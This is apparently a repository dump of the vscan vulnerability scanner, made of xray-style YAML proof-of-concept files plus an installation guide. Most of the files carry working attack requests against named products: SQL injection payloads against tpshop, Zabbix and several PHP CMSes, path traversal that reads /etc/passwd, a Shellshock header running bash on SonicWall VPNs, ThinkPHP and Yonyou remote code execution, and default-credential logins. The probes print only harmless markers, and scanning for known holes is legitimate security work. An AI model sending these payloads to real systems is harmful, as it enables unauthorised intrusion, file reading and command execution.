| rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1) 12 | expression: response.status == 404 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31))) 13 | expression: r0() 14 | detail: 15 | author: sakura404x 16 | links: 17 | - https://blog.csdn.net/weixin_42633229/article/details/117070546 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/showdoc-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-showdoc-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /server/index.php?s=/api/user/login 10 | body: username=showdoc&password=123456 11 | follow_redirects: true 12 | expression: response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"groupid") && response.body.bcontains(b"user_token") 13 | expression: r0() 14 | detail: 15 | author: B1anda0(https://github.com/B1anda0) 16 | links: 17 | - https://blog.star7th.com/2016/05/2007.html 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/solarwinds-cve-2020-10148.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-solarwinds-cve-2020-10148 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /web.config.i18n.ashx?l=en-US&v={{r1}} 12 | expression: response.status == 200 && response.body.bcontains(bytes("SolarWinds.Orion.Core.Common")) && response.body.bcontains(bytes("/Orion/NetPerfMon/TemplateSiblingIconUrl")) 13 | expression: r0() 14 | detail: 15 | author: su(https://suzzz112113.github.io/#blog) 16 | links: 17 | - https://kb.cert.org/vuls/id/843464 18 | CVE: CVE-2020-10148 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/sonarqube-cve-2020-27986-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sonarqube-cve-2020-27986-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/settings/values 10 | expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(bytes(string(b"sonaranalyzer-cs.nuget.packageVersion"))) && response.body.bcontains(bytes(string(b"sonar.core.id"))) 11 | expression: r0() 12 | detail: 13 | author: pa55w0rd(www.pa55w0rd.online/) 14 | links: 15 | - https://nvd.nist.gov/vuln/detail/CVE-2020-27986 16 | Affected Version: sonarqube < 8.4.2.36762 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/sonicwall-ssl-vpn-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sonicwall-ssl-vpn-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(40000, 44800) 6 | r2: randomInt(1140000, 1144800) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: GET 12 | path: /cgi-bin/jarrewrite.sh 13 | headers: 14 | X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}' 15 | follow_redirects: false 16 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) 17 | expression: r0() 18 | detail: 19 | author: sharecast 20 | links: 21 | - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ 22 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/spark-api-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-api-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /v1/submissions 10 | expression: response.status == 400 && response.body.bcontains(b"Missing an action") && response.body.bcontains(b"serverSparkVersion") 11 | expression: r0() 12 | detail: 13 | author: betta(https://github.com/betta-cyber) 14 | links: 15 | - https://xz.aliyun.com/t/2490 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/spark-webui-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-webui-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: / 10 | expression: response.status == 200 && response.body.bcontains(b"Spark") && response.body.bcontains(b"<strong>URL:</strong> spark:") 11 | expression: r0() 12 | detail: 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/spark/unacc 15 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/spring-cloud-cve-2020-5405.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cloud-cve-2020-5405 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). Do not edit.")) 12 | expression: r0() 13 | detail: 14 | author: kingkk(https://www.kingkk.com/) 15 | links: 16 | - https://pivotal.io/security/cve-2020-5405 17 | - https://github.com/spring-cloud/spring-cloud-config 18 | version: <= 2.1.6, 2.2.1 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/spring-cloud-cve-2020-5410.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cloud-cve-2020-5410 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a 10 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 11 | expression: r0() 12 | detail: 13 | author: Soveless(https://github.com/Soveless) 14 | links: 15 | - https://xz.aliyun.com/t/7877 16 | Affected Version: Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/springcloud-cve-2019-3799.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-springcloud-cve-2019-3799 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd 10 | follow_redirects: true 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: Loneyer 15 | links: 16 | - https://github.com/Loneyers/vuldocker/tree/master/spring/CVE-2019-3799 17 | version: <2.1.2, 2.0.4, 1.4.6 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/thinkcmf-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkcmf-lfi 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /?a=display&templateFile=README.md 10 | expression: response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README"))) 11 | expression: r0() 12 | detail: 13 | author: JerryKing 14 | links: 15 | - https://www.freebuf.com/vuls/217586.html 16 | ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/thinkphp-controller-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5-controller-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91 10 | expression: response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129") 11 | expression: r0() 12 | detail: 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce 15 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/thinkphp-method-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5023-method-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /index.php?s=captcha 10 | headers: 11 | Content-Type: application/x-www-form-urlencoded 12 | body: | 13 | _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu&get[]=1 14 | expression: response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu1") 15 | expression: r0() 16 | detail: 17 | links: 18 | - https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/thinkphp5-controller-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5-controller-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91 10 | expression: response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129") 11 | expression: r0() 12 | detail: 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce 15 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/thinkphp5023-method-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5023-method-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /index.php?s=captcha 10 | headers: 11 | Content-Type: application/x-www-form-urlencoded 12 | body: | 13 | _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu&get[]=1 14 | expression: response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu1") 15 | expression: r0() 16 | detail: 17 | links: 18 | - https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/tianqing-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tianqing-info-leak 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/dbstat/gettablessize 10 | expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"schema_name") && response.body.bcontains(b"table_name") 11 | expression: r0() 12 | detail: 13 | author: jingling(https://github.com/shmilylty) 14 | links: 15 | - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/tpshop-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tpshop-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /mobile/index/index2/id/1) and (select 1 from (select count(*),concat(0x716b627671,(select md5({{r}})),0x716b627671,floor(rand(0)*2))x from information_schema.tables group by x)a)-- 12 | follow_redirects: true 13 | expression: response.body.bcontains(bytes(md5(string(r)))) 14 | expression: r0() 15 | detail: 16 | author: hanxiansheng26(https://github.com/hanxiansheng26) 17 | links: 18 | - https://xz.aliyun.com/t/6635 19 | Affected Version: tpshop<3.0 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/uwsgi-cve-2018-7490.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-uwsgi-cve-2018-7490 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 10 | follow_redirects: false 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | links: 15 | - https://github.com/vulhub/vulhub/tree/master/uwsgi/CVE-2018-7490 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/vmware-vrealize-cve-2021-21975-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /casa/nodes/thumbprints 10 | headers: 11 | Content-Type: application/json 12 | body: | 13 | ["127.0.0.1:443/ui/"] 14 | follow_redirects: true 15 | expression: response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager")) 16 | expression: r0() 17 | detail: 18 | author: Loneyer 19 | links: 20 | - https://www.vmware.com/security/advisories/VMSA-2021-0004.html 21 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/weiphp-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weiphp-sql 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1)--+ 12 | expression: response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31))) 13 | expression: r0() 14 | detail: 15 | author: sakura404x 16 | links: 17 | - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md 18 | version: Weiphp<=5.0 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/wifisky-default-password-cnvd-2021-39012.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wifisky-default-password-cnvd-2021-39012 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /login.php?action=login&type=admin 10 | body: username=admin&password=admin 11 | follow_redirects: false 12 | expression: response.status == 200 && response.body.bcontains(b"{\"success\":\"true\", \"data\":{\"id\":1}, \"alert\":\"您正在使用默认密码登录,为保证设备安全,请立即修改密码\"}") 13 | expression: r0() 14 | detail: 15 | author: Print1n(http://print1n.top) 16 | links: 17 | - https://www.cnvd.org.cn/flaw/show/CNVD-2021-39012 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/wordpress-cve-2019-19985-infoleak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wordpress-cve-2019-19985-infoleak 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /wp-admin/admin.php?page=download_report&report=users&status=all 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"])) 12 | expression: r0() 13 | detail: 14 | author: bufsnake(https://github.com/bufsnake) 15 | links: 16 | - https://www.exploit-db.com/exploits/48698 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/wuzhicms-v410-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wuzhicms-v410-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed05") && response.body.bcontains(b"sql_error:MySQL Query Error") 12 | expression: r0() 13 | detail: 14 | author: leezp 15 | links: 16 | - https://github.com/wuzhicms/wuzhicms/issues/184 17 | Affected Version: wuzhicms-v4.1.0 18 | vuln_url: /api/sms_check.php 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/xdcms-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-xdcms-sql 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | r2: randomInt(800000000, 1000000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /index.php?m=member&f=login_save 13 | body: | 14 | username=dd' or extractvalue(0x0a,concat(0x0a,{{r1}}*{{r2}}))#&password=dd&submit=+%B5%C7+%C2%BC+ 15 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 16 | expression: r0() 17 | detail: 18 | author: amos1 19 | links: 20 | - https://www.uedbox.com/post/35188/ 21 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/xiuno-bbs-cvnd-2019-01348-reinstallation.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-xiuno-bbs-cvnd-2019-01348-reinstallation 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /install/ 10 | headers: 11 | Accept-Encoding: deflate 12 | follow_redirects: false 13 | expression: response.status == 200 && response.body.bcontains(bytes(string("/view/js/xiuno.js"))) && response.body.bcontains(bytes(string("Choose Language (选择语言)"))) 14 | expression: r0() 15 | detail: 16 | author: 清风明月(www.secbook.info) 17 | links: 18 | - https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 19 | influence_version: =< Xiuno BBS 4.0.4 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/yccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yccms-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(800000000, 1000000000) 6 | r1: randomInt(800000000, 1000000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: GET 12 | path: /admin/?a=Factory();print({{r}}%2b{{r1}});//../ 13 | expression: response.body.bcontains(bytes(string(r + r1))) 14 | expression: r0() 15 | detail: 16 | author: j4ckzh0u(https://github.com/j4ckzh0u),violin 17 | links: 18 | - https://blog.csdn.net/qq_36374896/article/details/84839891 19 | yccms: v3.3 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/yonyou-nc-bsh-servlet-bshservlet-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yonyou-nc-bsh-servlet-bshservlet-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(8000, 9999) 6 | r2: randomInt(8000, 9999) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /servlet/~ic/bsh.servlet.BshServlet 13 | body: bsh.script=print%28{{r1}}*{{r2}}%29%3B 14 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 15 | expression: r0() 16 | detail: 17 | author: B1anda0(https://github.com/B1anda0) 18 | links: 19 | - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/yungoucms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yungoucms-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(2000000000, 2100000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /?/member/cart/Fastpay&shopid=-1%20union%20select%20md5({{rand}}),2,3,4%20--+ 12 | follow_redirects: false 13 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 14 | expression: r0() 15 | detail: 16 | author: cc_ci(https://github.com/cc8ci) 17 | links: 18 | - https://www.secquan.org/Prime/1069179 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/zabbix-authentication-bypass.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-authentication-bypass 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /zabbix.php?action=dashboard.view&dashboardid=1 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(bytes("<a class=\"top-nav-zbbshare\" target=\"_blank\" title=\"Zabbix Share\" href=\"https://share.zabbix.com/\">Share</a>")) && response.body.bcontains(b"<title>Dashboard") 12 | expression: r0() 13 | detail: 14 | author: FiveAourThe(https://github.com/FiveAourThe) 15 | links: 16 | - https://www.exploit-db.com/exploits/47467 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/zabbix-cve-2016-10134-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-cve-2016-10134-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(2000000000, 2100000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0) 12 | follow_redirects: true 13 | expression: response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31))) 14 | expression: r0() 15 | detail: 16 | author: sharecast 17 | links: 18 | - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/zabbix-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /index.php 10 | body: name=Admin&password=zabbix&autologin=1&enter=Sign+in 11 | expression: response.status == 302 && response.headers["location"] == "zabbix.php?action=dashboard.view" && response.headers["set-cookie"].contains("zbx_session") 12 | expression: r0() 13 | detail: 14 | author: fuzz7j(https://github.com/fuzz7j) 15 | links: 16 | - https://www.zabbix.com/documentation/3.4/zh/manual/quickstart/login 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/zcms-v3-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zcms-v3-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec991e") 12 | expression: r0() 13 | detail: 14 | author: MaxSecurity(https://github.com/MaxSecurity) 15 | links: 16 | - https://www.anquanke.com/post/id/183241 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/zeit-nodejs-cve-2020-5284-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zeit-nodejs-cve-2020-5284-directory-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /_next/static/../server/pages-manifest.json 10 | expression: 'response.status == 200 && response.headers["Content-Type"].contains("application/json") && "/_app\": \".*?_app\\.js".bmatches(response.body)' 11 | expression: r0() 12 | detail: 13 | author: x1n9Qi8 14 | links: 15 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-1728 16 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5284 17 | -------------------------------------------------------------------------------- /static/Installation.md: -------------------------------------------------------------------------------- 1 | # 编译 2 | 3 | ```sh 4 | sudo apt install -y libpcap-dev golang git 5 | git clone https://github.com/veo/vscan.git 6 | cd vscan 7 | go build 8 | ``` 9 | 10 | # 安装/运行 11 | 12 | 1.在运行vscan之前,你必须先安装libpcap库 13 | 14 | ```sh 15 | sudo apt install -y libpcap-dev 16 | ``` 17 | 18 | 2.前往 19 | [https://github.com/veo/vscan/releases/](https://github.com/veo/vscan/releases/) 20 | 下载vscan最新版运行: 21 | 22 | ## 运行时动态库版本问题 23 | 24 | 如果你运行的时候出现了`libpcap.so.0.8: cannot open shared object file: No such file or directory`的错误 25 | 26 | 请先检查libpcap库是否已经正常安装。 27 | ```sh 28 | ls -all /lib64/libpcap* 29 | ``` 30 | 如果有安装其他版本的libpcap库,可建立一个软连接到/lib64/libpcap.so.0.8即可正常运行程序 31 | 32 | ```sh 33 | ln -s /lib64/libpcap.so.1.9.1 /lib64/libpcap.so.0.8 34 | ``` -------------------------------------------------------------------------------- /static/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/veo/vscan/1beb10c08e377e15b7dd417be1843bb75aa8c4f0/static/logo.png -------------------------------------------------------------------------------- /static/starfile.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/veo/vscan/1beb10c08e377e15b7dd417be1843bb75aa8c4f0/static/starfile.jpeg -------------------------------------------------------------------------------- /static/vscan-run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/veo/vscan/1beb10c08e377e15b7dd417be1843bb75aa8c4f0/static/vscan-run.png --------------------------------------------------------------------------------